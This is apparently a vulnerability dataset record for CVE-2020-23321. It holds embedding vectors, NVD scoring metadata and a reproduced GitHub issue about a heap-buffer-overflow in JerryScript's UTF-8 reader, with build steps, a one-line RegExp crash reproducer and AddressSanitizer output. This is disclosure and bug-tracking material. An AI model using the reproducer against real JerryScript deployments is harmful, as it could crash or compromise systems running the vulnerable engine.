0.01918756030499935, -0.005039951764047146, 0.020188402384519577, 0.02116064727306366, 0.011352401226758957, 0.010830534622073174, 0.014855346642434597, -0.001400284469127655, 0.011280912905931473, 0.032827600836753845, 0.007038060110062361, -0.018601352348923683, -0.008206900209188461, -0.03102608397603035, -0.01468377374112606, -0.0047432733699679375, -0.004428723361343145, 0.019430622458457947, 0.028423897922039032, -0.00700946431607008, -0.004046258982270956, -0.00582632701843977, -0.024963844567537308, 0.022418849170207977, 0.01180278044193983, -0.012310349382460117, -0.013439870439469814, 0.019659385085105896, -0.014133310876786709, -0.0071667395532131195, -0.004110598936676979, -0.005504627712070942, 0.027037017047405243, -0.006484022829681635, 0.013332637958228588, 0.02776620164513588, -0.0071667395532131195, -0.03937596082687378, 0.0028291642665863037, 0.03062574751675129, -0.018186718225479126, 0.014183352701365948, -0.017686298117041588, 0.01870143786072731, 0.0016487075481563807, -0.0033242234494537115, -0.011831375770270824, -0.009843990206718445, 0.0059836022555828094, 0.0069522736594080925, 0.019001688808202744, -0.002280488610267639, -0.005779859144240618, 0.010137094184756279, -0.0024502743035554886, -0.0021535963751375675, 0.002217936096712947, 0.012224563397467136, -0.015212790109217167, 0.006108707282692194, -0.0014038588851690292, -0.005876368843019009, 0.011688398197293282, 0.04066275805234909, 0.010037009604275227, 0.012238861061632633, -0.008442812599241734, -0.0012126266956329346, -0.0037781763821840286, 0.006047941744327545, -0.0048719532787799835, 0.032913386821746826, 0.006991592235863209, -0.01977376826107502, 0.0000534489554411266, 0.016857029870152473, 0.0009472249657846987, -0.020460058003664017, 0.013740123249590397, 0.005054249428212643, -0.001326114870607853, 0.022333061322569847, 0.01504121720790863, 0.05290161818265915, 0.01145248580724001, -0.0007568863220512867, -0.004164215177297592, -0.008914637379348278, -0.011774185113608837, 0.0030043115839362144, -0.0032974150963127613, -0.0012135202996432781, 0.011123637668788433, -0.014283437281847, 0.014347776770591736, -0.013976035639643669, -0.02249033749103546, 0.02066022716462612, -0.0008802043157629669, 0.0011947544990107417, -0.013954589143395424, 0.002698697382584214, 0.019673682749271393, 0.0032437986228615046, -0.006537639070302248, -0.03740287572145462, -0.0011464996496215463, 0.0006313343765214086, 0.006015771999955177, -0.007656436879187822, -0.006291003432124853, 0.002675463678315282, 0.01731455698609352, 0.012860812246799469, -0.007863754406571388, -0.023691346868872643, -0.00885744672268629, 0.012288902886211872, 0.007978135719895363, -0.015212790109217167, 0.009143401868641376, -0.010079903528094292, 0.024620698764920235, -0.019402027130126953, -0.011759886518120766, -0.012939450331032276, 0.020874692127108574, -0.005962155293673277, 0.012867961078882217, -0.015026919543743134, 0.0015879421262070537, 0.02883853204548359, -0.0034975833259522915, -0.019044583663344383, 0.014354925602674484, -0.006333896424621344, -0.005097142420709133, -0.00008573055674787611, 0.010923469439148903, -0.003034694120287895, -0.006587681360542774, -0.01705719716846943, -0.01058032363653183, 0.011102191172540188, -0.005808454938232899, -0.028767041862010956, -0.01817242056131363, 0.02749454416334629, -0.002400232246145606, 0.005708370823413134, -0.013976035639643669, -0.0002192691754316911, -0.0003688368888106197, -0.002244744449853897, -0.006087260786443949, -0.00932927243411541, 0.013775867410004139, 0.0052008009515702724, -0.011781333945691586, 0.0048719532787799835, 0.013196809217333794, 0.011974353343248367, -0.02361985854804516, -0.0037317087408155203, -0.015484446659684181, 0.002316233003512025, -0.010308667086064816, -0.021804045885801315, 0.007138144224882126, 0.005318757612258196, 0.008399919606745243, 0.018515566363930702, 0.0011518612736836076, 0.00630530109629035, 0.008707320317626, -0.009843990206718445, 0.010508835315704346, -0.004475191235542297, 0.018115229904651642, 0.019259048625826836, -0.007413375657051802, -0.006230237893760204, 0.000877970305737108, 0.0017827488481998444, -0.012667792849242687, -0.0026861869264394045, 0.0061980681493878365, 0.0008900340180844069, -0.007134569808840752, 0.0072489515878260136, -0.02004542388021946, -0.03451473265886307, 0.017071494832634926, 0.00886459555476904, -0.010151391848921776, 0.011416741646826267, 0.015613126568496227, -0.03605888783931732, -0.009650970809161663, -0.019387729465961456, -0.025964686647057533, 0.003903281642124057, -0.001239434932358563, -0.003903281642124057, 0.01088772527873516, -0.018329696729779243, -0.03603029251098633, 0.008164006285369396, -0.016899922862648964, -0.010587472468614578, 0.019402027130126953, -0.015069812536239624, 0.029310356825590134, 0.005250843241810799, 0.029939457774162292, 0.02147519774734974, 0.020274188369512558, -0.00531160831451416, 0.00046914443373680115, 0.008178303949534893, -0.007349035702645779, 0.0018569183303043246, 0.00962237548083067, -0.012088734656572342, 0.00009533685079077259, 0.019659385085105896, -0.009936925955116749, -0.005622584372758865, 0.014068971388041973, 0.009250634349882603, 0.003942600451409817, 0.010859129950404167, 0.016971411183476448, -0.013196809217333794, -0.01078049186617136, 0.026679573580622673, -0.020288486033678055, 0.00850715208798647, 0.0008600981091149151, -0.015727508813142776, -0.012224563397467136, -0.004028386902064085, 0.009357867762446404, 0.009879734367132187, -0.017957955598831177, 0.0018274292815476656, -0.010208582505583763, -0.0009516929858364165, 0.006126579362899065, -0.008271239697933197, -0.007906647399067879, -0.006866487208753824, 0.018158122897148132, -0.0020749587565660477, 0.016499586403369904, 0.023005055263638496, 0.00622666347771883, -0.02799496427178383, -0.0007689500343985856, 0.017300259321928024, 0.014969728887081146, 0.014898239634931087, 0.00850715208798647, 0.0036602201871573925, 0.0076707350090146065, 0.020831799134612083, 0.015527339652180672, -0.006591255776584148, -0.008764511905610561, 0.02343398705124855, -0.011445336975157261, 0.0076993303373456, 0.012346094474196434, -0.019430622458457947, 0.03039698489010334, -0.002396657830104232, 0.01737174764275551, -0.014111864380538464, 0.0049112718552351, 0.0339142270386219, 0.0028255898505449295, -0.01088772527873516, -0.006423257291316986, -0.001436028745956719, -0.017257366329431534, -0.014783858321607113, -0.00885744672268629, -0.0024681463837623596, -0.022247275337576866, -0.016356607899069786, -0.01088772527873516, 0.007216781843453646, 0.04661061614751816, 0.006362492218613625, 0.017328854650259018, -0.0006988017703406513, 0.029853669926524162, 0.03339950740337372, -0.026679573580622673, 0.01842978037893772, 0.012553411535918713, -0.005633307620882988, -0.0035762209445238113, 0.024534912779927254, -0.011059298180043697, 0.011716993525624275, -0.010322964750230312, -0.016499586403369904, -0.0008355238824151456, 0.010079903528094292, 0.0027487394399940968, 0.043722473084926605, 0.008735915645956993, -0.024005897343158722, -0.0116026122123003, 0.01968798041343689, -0.009021870791912079, -0.0004812081460841, 0.0019301942083984613, -0.006123004946857691, 0.008035327307879925, -0.006748531013727188, 0.03763163834810257, 0.020159807056188583, 0.037831805646419525, 0.018229611217975616, 0.01165265403687954, -0.012124478816986084, 0.02570732682943344, 0.01301093865185976, 0.002816653810441494, -0.006669893395155668, 0.013497062027454376, -0.020645929500460625, -0.0081497086212039, 0.009157699532806873, 0.014783858321607113, -0.025335585698485374, -0.0013797314604744315, -0.008721617981791496, 0.015341470018029213, 0.009929777123034, 0.0070845275186002254, 0.017886467278003693, -0.0064768739975988865, 0.01281077042222023, 0.0014994749799370766, -0.014562242664396763, -0.022790590301156044, 0.005129312630742788, 0.03848950192332268, 0.021275030449032784, -0.005672626197338104, -0.017614809796214104, -0.00221614888869226, 0.02464929409325123, -0.004578849766403437, -0.010994957759976387, 0.023333903402090073, 0.00930782500654459, -0.011795631609857082, -0.027208589017391205, -0.013161065056920052, -0.015698913484811783, 0.006923678331077099, -0.014076120220124722, -0.0005736966268159449, 0.01588478311896324, 0.023777132853865623, 0.00427502254024148, 0.0030096732079982758, -0.004439446609467268, -0.017157282680273056, -0.00834987685084343, 0.008557193912565708, 0.005847773514688015, 0.013396977446973324, -0.021389411762356758, -0.02147519774734974, -0.003631624625995755, 0.006416108459234238, -0.01432633027434349, -0.011745588853955269, 0.009393611922860146, 0.017171580344438553, -0.009593780152499676, -0.006794998422265053, -0.01272498443722725, 0.0070166136138141155, -0.004460893105715513, 0.011609761044383049, -0.033227935433387756, 0.01559882890433073, -0.004718252457678318, 0.017800679430365562, -0.0026236344128847122, 0.006333896424621344, -0.0010696492390707135, 0.007066655438393354, -0.020788906142115593, -0.007770819123834372, 0.0016603245167061687, 0.004861230030655861, -0.0035011577419936657, 0.016056356951594353, -0.005486755631864071, -0.016771243885159492, -0.01794365793466568, 0.01464088074862957, -0.006087260786443949, -0.011666951701045036, -0.005922836717218161, -0.009543738327920437, -0.007013039197772741, 0.005551095586270094, -0.0016299417475238442, -0.0406055673956871, 0.017571916803717613, -0.0007466098177246749, -0.002877419115975499, 0.016799839213490486, -0.0038174951914697886, -0.0004946122644469142, -0.00224295724183321, -0.011152232997119427, 0.015384363010525703, -0.003846090752631426, -0.014633731916546822, -0.004185661673545837, -0.0069344015792012215, 0.005054249428212643, 0.019530706107616425, -0.01241043396294117, 0.0024735082406550646, -0.02526409737765789, 0.015498744323849678, -0.019430622458457947, -0.02503533475100994, 0.015384363010525703, -0.006108707282692194, -0.002621847204864025, -0.002460997551679611, 0.007145293056964874, -0.027437353506684303, 0.0003395712119527161, -0.006165898405015469, 0.0012805408332496881, -0.013654337264597416, -0.0103801554068923, 0.03339950740337372, -0.010215731337666512, 0.013783016242086887, 0.011888566426932812, 0.01053743064403534, 0.0034386052284389734, 0.008793107233941555, 0.0005160588771104813, -0.0033617548178881407, 0.002736228983849287, 0.004278596956282854, 0.009593780152499676, 0.013532806187868118, 0.015656020492315292, 0.009715311229228973, 0.005611861124634743, -0.021317923441529274, -0.02093188464641571, -0.008735915645956993, -0.012646346352994442, 0.0127178356051445, 0.003685241099447012, 0.010430197231471539, 0.005665477365255356, 0.008142559789121151, -0.0066269999369978905, -0.002484231488779187, -0.001793472096323967, -0.0020999799016863108, 0.005115014500916004, -0.007692181505262852, -0.01499832421541214, -0.029567716643214226, -0.004804038908332586, -0.009050466120243073, -0.015741806477308273, 0.04040540009737015, -0.022433146834373474, 0.010137094184756279, -0.0000662387246848084, 0.00006573607242899016, -0.010144243016839027, -0.013418423943221569, -0.007216781843453646, 0.018444078043103218, -0.007584948558360338, -0.0055225002579391, -0.018329696729779243, -0.004221406299620867, -0.014412117190659046, -0.029882265254855156, 0.007592097390443087, 0.027022719383239746, -0.006769977509975433, -0.00404983339831233, -0.02107486128807068, 0.006648446898907423, 0.010701854713261127, 0.0032420114148408175, -0.0008373110904358327, -0.0016808774089440703, 0.004900548607110977, 0.00544386263936758, 0.01012994535267353, -0.003154437756165862, -0.007116697728633881, 0.013833058066666126, 0.000499080284498632, 0.015956271439790726, 0.0241059809923172, 0.019487813115119934, 0.010008414275944233, -0.0006040792795829475, 0.011774185113608837, -0.012617751024663448, 0.014855346642434597, 0.017529023811221123, 0.014583689160645008, 0.014912537299096584, -0.004260724876075983, -0.011359550058841705, 0.009936925955116749, -0.004543105140328407, -0.01088772527873516, 0.003333159489557147, 0.011588314548134804, 0.002916737925261259, 0.00946510024368763, -0.00045462328125722706, 0.008471407927572727, -0.012775026261806488, 0.01058032363653183, 0.027394460514187813, -0.0030186092481017113, -0.0029775032307952642, -0.02173255756497383, 0.003029332496225834, 0.0006849508499726653, 0.006837891880422831, 0.0013895611045882106, -0.02991086058318615, 0.015641722828149796, 0.02263331413269043, -0.009543738327920437, 0.015069812536239624, 0.01185282226651907, -0.007656436879187822, 0.006244535557925701, -0.0051042912527918816, -0.0007828010129742324, 0.013246851041913033, -0.021446602419018745, 0.0067092119716107845, -0.020145509392023087, -0.007870903238654137, 0.0018873009830713272, -0.018672842532396317, -0.024792272597551346, 0.01064466405659914, -0.012153075076639652, -0.005812029354274273, -0.006794998422265053, -0.02875274419784546, 0.01185282226651907, -0.00504352618008852, 0.01821531355381012, 0.02749454416334629, 0.0072310795076191425, -0.007570650428533554, 0.009286378510296345, 0.03071153536438942, 0.01857275702059269, -0.004693231545388699, -0.00757779972627759, 0.006998741067945957, 0.013432721607387066, 0.013139618560671806, -0.011995799839496613, -0.013246851041913033, 0.011566867120563984, -0.010072754696011543, 0.0038997072260826826, 0.0050220792181789875, -0.021718259900808334, -0.018629947677254677, 0.0030239708721637726, -0.01981666125357151, 0.0092649320140481, -0.008278388530015945, -0.0002832738682627678, -0.010079903528094292, -0.01089487411081791, -0.0010562451789155602, -0.007456268649548292, -0.017243068665266037, -0.009036168456077576, -0.009071912616491318, 0.001967725809663534, 0.026851145550608635, -0.0026701020542532206, -0.0082569420337677, -0.005483181215822697, 0.006072963122278452, 0.00582632701843977, 0.025021035224199295, 0.02084609679877758, -0.0024913803208619356, -0.003981919027864933, 0.007685032673180103, 0.012467624619603157, 0.0103801554068923, 0.021489495411515236, 0.006451853085309267, 0.022433146834373474, 0.009186294861137867, 0.0006402704166248441, -0.0071488674730062485, 0.015098407864570618, -0.001985597889870405, -0.00957233365625143, -0.005929985549300909, 0.0176291074603796, 0.004714678041636944, -0.01305383164435625, -0.013933142647147179, -0.0114953787997365, 0.0384037159383297, 0.012632048688828945, 0.015784699469804764, 0.01665686070919037, -0.009901181794703007, 0.027122803032398224, 0.012682090513408184, 0.0036226885858923197, 0.0030632896814495325, 0.029267463833093643, 0.0023895089980214834, 0.016399502754211426, -0.010458793491125107, -0.0006340151885524392, 0.02120354026556015, -0.014912537299096584, -0.026222046464681625, -0.004357234574854374, 0.009507994167506695, -0.003728134324774146, 0.001940917456522584, -0.02030278369784355, -0.0005897815572097898, -0.010394453071057796, 0.022976459935307503, -0.00035007111728191376, 0.008128262124955654, -0.01064466405659914, 0.01201009750366211, 0.00023881685046944767, -0.001408326905220747, 0.008921786211431026, -0.01088772527873516, -0.01579899713397026, 0.0034028608351945877, 0.020603036507964134, -0.01642809808254242, 0.010215731337666512, 0.006566234864294529, 0.0011152232764288783, -0.008471407927572727, -0.0019337686244398355, 0.018629947677254677, 0.020831799134612083, 0.009929777123034, 0.0032187774777412415, -0.015055514872074127, -0.015455851331353188, 0.025607243180274963, -0.0098225437104702, 0.006276705767959356, -0.024005897343158722, -0.003290266264230013, 0.026264939457178116 ]
CVE-2020-23321
2021-06-10T23:15:08.197000
There is a heap-buffer-overflow at lit-strings.c:431 in lit_read_code_unit_from_utf8 in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3870" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3870
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision cae6cd0 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` new RegExp("\ud800", "u").exec(1) ``` ###### Output ``` ================================================================= ==100375==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf610073f at pc 0x080c25d2 bp 0xffdaad88 sp 0xffdaad78 READ of size 1 at 0xf610073f thread T0 #0 0x80c25d1 in lit_read_code_unit_from_utf8 /home/jerryscript/jerry-core/lit/lit-strings.c:431 #1 0x80c2b8d in lit_cesu8_peek_next /home/jerryscript/jerry-core/lit/lit-strings.c:522 #2 0x80ea990 in re_parse_next_token /home/jerryscript/jerry-core/parser/regexp/re-parser.c:872 #3 0x80eba19 in re_parse_alternative /home/jerryscript/jerry-core/parser/regexp/re-parser.c:1152 #4 0x80e642e in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:131 #5 0x80afbd2 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:347 #6 0x8129048 in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:174 #7 0x81290c1 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:218 #8 0x8080fed in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1260 #9 0x809866e in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1275 #10 0x80f0e29 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:866 #11 0x80ffbd2 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4237 #12 0x81000d5 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4318 #13 0x80eefc0 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:338 #14 0x804e1ce in jerry_run /home/jerryscript/jerry-core/api/jerry.c:595 #15 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759 #16 0xf78a5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #17 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0) 0xf610073f is located 0 bytes to the right of 15-byte region [0xf6100730,0xf610073f) allocated by thread T0 here: #0 0xf7ad9dee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x80be178 in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80be248 in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x80be2c7 in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:323 #4 0x8100214 in ecma_alloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:194 #5 0x8061b1e in ecma_new_ecma_string_from_utf8_buffer /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:269 #6 0x8061b1e in ecma_new_ecma_string_from_utf8 /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:353 #7 0x8073bf5 in ecma_find_or_create_literal_string /home/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:134 #8 0x80c4501 in parser_compute_indicies /home/jerryscript/jerry-core/parser/js/js-parser.c:130 #9 0x80c61c6 in parser_post_processing /home/jerryscript/jerry-core/parser/js/js-parser.c:973 #10 0x80cbcb9 in parser_parse_source /home/jerryscript/jerry-core/parser/js/js-parser.c:2192 #11 0x80cf05a in parser_parse_script /home/jerryscript/jerry-core/parser/js/js-parser.c:2813 #12 0x804dc81 in jerry_parse /home/jerryscript/jerry-core/api/jerry.c:447 #13 0x804ac76 in main /home/jerryscript/jerry-main/main-unix.c:750 #14 0xf78a5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/lit/lit-strings.c:431 lit_read_code_unit_from_utf8 Shadow bytes around the buggy address: 0x3ec20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ec200e0: fa fa 00 05 fa fa 00[07]fa fa fd fa fa fa fd fd 0x3ec200f0: fa fa 00 00 fa fa 00 00 fa fa 00 06 fa fa 00 00 0x3ec20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==100375==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337.
heap-buffer-overflow in lit_read_code_unit_from_utf8
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3870/comments
0
2020-06-06T14:03:56
2020-06-08T09:09:09Z
https://github.com/jerryscript-project/jerryscript/issues/3870
632,483,470
3,870
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : heap-buffer-overflow in lit_read_code_unit_from_utf8 Issue date: --- start body --- ###### JerryScript revision cae6cd0 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` new RegExp("\ud800", "u").exec(1) ``` ###### Output ``` ================================================================= ==100375==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf610073f at pc 0x080c25d2 bp 0xffdaad88 sp 0xffdaad78 READ of size 1 at 0xf610073f thread T0 #0 0x80c25d1 in lit_read_code_unit_from_utf8 /home/jerryscript/jerry-core/lit/lit-strings.c:431 #1 0x80c2b8d in lit_cesu8_peek_next /home/jerryscript/jerry-core/lit/lit-strings.c:522 #2 0x80ea990 in re_parse_next_token /home/jerryscript/jerry-core/parser/regexp/re-parser.c:872 #3 0x80eba19 in re_parse_alternative /home/jerryscript/jerry-core/parser/regexp/re-parser.c:1152 #4 0x80e642e in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:131 #5 0x80afbd2 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:347 #6 0x8129048 in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:174 #7 0x81290c1 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:218 #8 0x8080fed in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1260 #9 0x809866e in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1275 #10 0x80f0e29 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:866 #11 0x80ffbd2 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4237 #12 0x81000d5 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4318 #13 0x80eefc0 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:338 #14 0x804e1ce in jerry_run /home/jerryscript/jerry-core/api/jerry.c:595 #15 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759 #16 0xf78a5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #17 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0) 0xf610073f is located 0 bytes to the right of 15-byte region [0xf6100730,0xf610073f) allocated by thread T0 here: #0 0xf7ad9dee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x80be178 in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80be248 in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x80be2c7 in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:323 #4 0x8100214 in ecma_alloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:194 #5 0x8061b1e in ecma_new_ecma_string_from_utf8_buffer /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:269 #6 0x8061b1e in ecma_new_ecma_string_from_utf8 /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:353 #7 0x8073bf5 in ecma_find_or_create_literal_string /home/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:134 #8 0x80c4501 in parser_compute_indicies /home/jerryscript/jerry-core/parser/js/js-parser.c:130 #9 0x80c61c6 in parser_post_processing /home/jerryscript/jerry-core/parser/js/js-parser.c:973 #10 0x80cbcb9 in parser_parse_source /home/jerryscript/jerry-core/parser/js/js-parser.c:2192 #11 0x80cf05a in parser_parse_script /home/jerryscript/jerry-core/parser/js/js-parser.c:2813 #12 0x804dc81 in jerry_parse /home/jerryscript/jerry-core/api/jerry.c:447 #13 0x804ac76 in main /home/jerryscript/jerry-main/main-unix.c:750 #14 0xf78a5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/lit/lit-strings.c:431 lit_read_code_unit_from_utf8 Shadow bytes around the buggy address: 0x3ec20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ec200e0: fa fa 00 05 fa fa 00[07]fa fa fd fa fa fa fd fd 0x3ec200f0: fa fa 00 00 fa fa 00 00 fa fa 00 06 fa fa 00 00 0x3ec20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==100375==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337. --- end body ---
5,858
[ -0.0248884130269289, -0.0019125316757708788, -0.0005018119118176401, -0.006848684977740049, 0.009610016830265522, 0.010003451257944107, -0.013668227009475231, 0.03371884673833847, -0.03607945516705513, 0.004677506163716316, -0.007191119249910116, 0.009012578055262566, -0.018943171948194504, 0.008473426103591919, 0.020283764228224754, 0.01967175491154194, -0.02089577540755272, -0.010163740254938602, -0.03296111896634102, 0.015955979004502296, -0.005522663239389658, 0.0006866899784654379, -0.014425953850150108, 0.05190429091453552, -0.010965181514620781, 0.006885114125907421, 0.0006848684861324728, -0.0047321501187980175, 0.010936038568615913, 0.01991947367787361, 0.0234603900462389, 0.005948884412646294, -0.01585397683084011, 0.010732035152614117, 0.03718690201640129, 0.011380474083125591, 0.021901220083236694, 0.07210062444210052, -0.018083442002534866, -0.018200015649199486, -0.009755733422935009, -0.030425647273659706, -0.013952374458312988, 0.04365672543644905, 0.010418743826448917, 0.045288752764463425, 0.019176317378878593, -0.0049543678760528564, -0.03572973608970642, 0.015635402873158455, 0.00263200793415308, 0.003626524470746517, -0.008407853543758392, -0.07705499231815338, 0.02704502083361149, -0.009034435264766216, 0.01742771826684475, 0.015256538987159729, 0.034913722425699234, 0.010455173440277576, -0.006710254121571779, -0.009850448928773403, 0.012859499081969261, 0.01080489344894886, 0.005464376416057348, 0.04511389136314392, -0.013136360794305801, 0.003475343342870474, 0.01425109338015318, 0.02606871910393238, -0.007158332969993353, -0.011795766651630402, 0.03173709660768509, 0.032582253217697144, -0.004134711343795061, 0.001453524106182158, -0.008305852301418781, 0.02177007496356964, -0.012852213345468044, 0.012917785905301571, 0.0006926096975803375, 0.0067430404014885426, -0.022382086142897606, 0.013959660194814205, 0.008043562062084675, 0.009690160863101482, -0.038032058626413345, -0.06924457848072052, -0.017894010990858078, -0.029842780902981758, -0.025106988847255707, 0.029522204771637917, -0.025136131793260574, 0.02066262811422348, -0.002582828514277935, 0.02179921790957451, -0.044618453830480576, -0.006655610632151365, -0.05301173776388168, 